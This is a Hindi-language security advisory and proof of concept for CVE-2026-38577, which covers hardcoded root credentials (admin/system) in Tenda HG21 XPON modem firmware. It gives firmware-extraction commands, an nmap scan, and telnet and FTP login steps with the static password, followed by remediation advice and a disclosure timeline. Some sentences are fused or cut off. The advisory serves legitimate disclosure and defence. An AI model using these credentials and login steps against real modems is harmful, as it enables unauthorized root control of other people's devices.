
प्रूफ-ऑफ-कॉन्सेप्ट जो Tenda HG21 XPON मॉडेम फर्मवेयर में हार्डकोडेड रूट क्रेडेंशियल्स (admin/system) को प्रदर्शित करता है, जो टेलनेट और FTP के माध्यम से अनधिकृत रूट एक्सेस को सक्षम बनाता है।
| फ़ील्ड | मान |
|---|---|
| CVE ID | CVE-2026-38577 |
| विक्रेता | टेंडा |
| उत्पाद | टेंडा HG21 (XPON फाइबर मॉडेम) |
| प्रभावित संस्करण | V4.0.0-260302 |
| उत्पाद कुंजी | HG21-V1.0-TDE01 |
| हार्डवेयर संस्करण | V1.0 |
| फर्मवेयर निर्माण तिथि | 2026-03-02 |
| फर्मवेयर फ़ाइल | US_HG21re_300002982_en_xpon_2.zip |
| भेद्यता वर्ग | CWE-798: हार्डकोडेड क्रेडेंशियल्स का उपयोग |
| खोजकर्ता | अनमोल सिंह राजपूत — स्वतंत्र सुरक्षा शोधकर्ता |
| प्रकटीकरण स्थिति | CVE आरक्षण के समय विक्रेता को अभी तक सूचित नहीं किया गया — CVE असाइनमेंट तिथि से 90-दिवसीय जिम्मेदार प्रकटीकरण समयरेखा लागू होती है |
टेंडा HG21 XPON फाइबर मॉडेम के फर्मवेयर विश्लेषण से शिप किए गए फर्मवेयर इमेज में बेक किया गया एक हार्डकोडेड प्रशासनिक खाता उजागर हुआ। इस खाते को पूर्ण रूट विशेषाधिकार (UID 0) प्रदान किए गए हैं और इसके क्रेडेंशियल्स सभी डिवाइसों पर स्थिर हैं, जिसका अर्थ है कि कोई भी हमलावर जो किसी कमजोर यूनिट पर उजागर प्रबंधन सेवा तक पहुँच सकता है, ग्राहक-सेट वेब-UI पासवर्ड जाने बिना रूट के रूप में प्रमाणित हो सकता है।
/etc/passwd एक admin प्रविष्टि के साथ आता है जिसमें SHA256crypt पासवर्ड हैश है जो स्थिर मान system में हल होता है।0 है — अर्थात, यह वास्तव में रूट है, कोई प्रतिबंधित सेवा खाता नहीं।/etc/shadow मौजूद नहीं है, इसलिए passwd में कमजोर/स्थिर हैश ही खाते की सुरक्षा करने वाला एकमात्र द्वार है।/etc/inetd.conf telnetd और ftpd शुरू करता है, दोनों रूट के रूप में स्पॉन होते हैं, इसलिए हार्डकोडेड खाता नेटवर्क पर पहुँच योग्य है, न कि केवल सीरियल/UART कंसोल पर।किसी कमजोर डिवाइस की टेलनेट (TCP/23) या FTP (TCP/21) सेवा तक नेटवर्क पहुँच रखने वाला हमलावर स्थिर पासवर्ड का उपयोग करके admin के रूप में लॉग इन कर सकता है और रूट शेल / रूट-स्तरीय फ़ाइल पहुँच प्राप्त कर सकता है। यह कम से कम निम्नलिखित की अनुमति देता है:
मूल सबमिशन से CVSS वेक्टर (प्रकाशित होने पर विक्रेता स्कोरिंग भिन्न हो सकती है):
यह एक क्रेडेंशियल-आधारित PoC है — यह प्रदर्शित करता है कि हार्डकोडेड खाता प्रमाणित होता है और रूट प्रदान करता है, कोई मेमोरी-भ्रष्टाचार शोषण नहीं। इसे केवल उस डिवाइस पर चलाएँ जिसके आप मालिक हैं या जिसका परीक्षण करने के लिए आपको स्पष्ट रूप से अधिकृत किया गया है।
# फर्मवेयर निकालें (binwalk या आपकी पसंद का विक्रेता टूल)
binwalk -e US_HG21re_300002982_en_xpon_2.bin
# passwd फ़ाइल का पता लगाएँ और निरीक्षण करें
find . -name passwd
cat squashfs-root/etc/passwd
# -> admin:<sha256crypt-hash-of-"system">:0:0:root:/root:/bin/sh
nmap -p 21,23 <target-ip>
telnet <target-ip>
# login: admin
# password: system
ftp <target-ip>
# Name: admin
# Password: system
किसी भी सेवा पर सफल लॉगिन रूट-विशेषाधिकार वाला शेल/FTP सत्र लौटाता है (id uid=0(root) रिपोर्ट करेगा)।
admin/system खाते को पूरी तरह से हटा देना चाहिए, या कम से कम पहले बूट पर सेट किया गया अद्वितीय, प्रति-डिवाइस यादृच्छिक पासवर्ड अनिवार्य करना चाहिए (केवल सीरियल नंबर से व्युत्पन्न नहीं)।telnetd/ftpd को डिफ़ॉल्ट रूप से अक्षम करें; दूरस्थ प्रशासन के लिए स्पष्ट ऑप्ट-इन और प्रमाणित, एन्क्रिप्टेड चैनल (SSH/SFTP) की आवश्यकता हो।| तिथि | घटना |
|---|---|
| 2026-03-02 | कमजोर फर्मवेयर बिल्ड जारी किया गया |
| — | स्वतंत्र फर्मवेयर विश्लेषण के दौरान खोजा गया |
| 2026-04-09 | MITRE के माध्यम से CVE-2026-38577 आरक्षित |
| — | विक्रेता सूचना लंबित (CVE असाइनमेंट से 90-दिवसीय प्रकटीकरण विंडो) |
निम्न द्वारा खोजा और रिपोर्ट किया गया: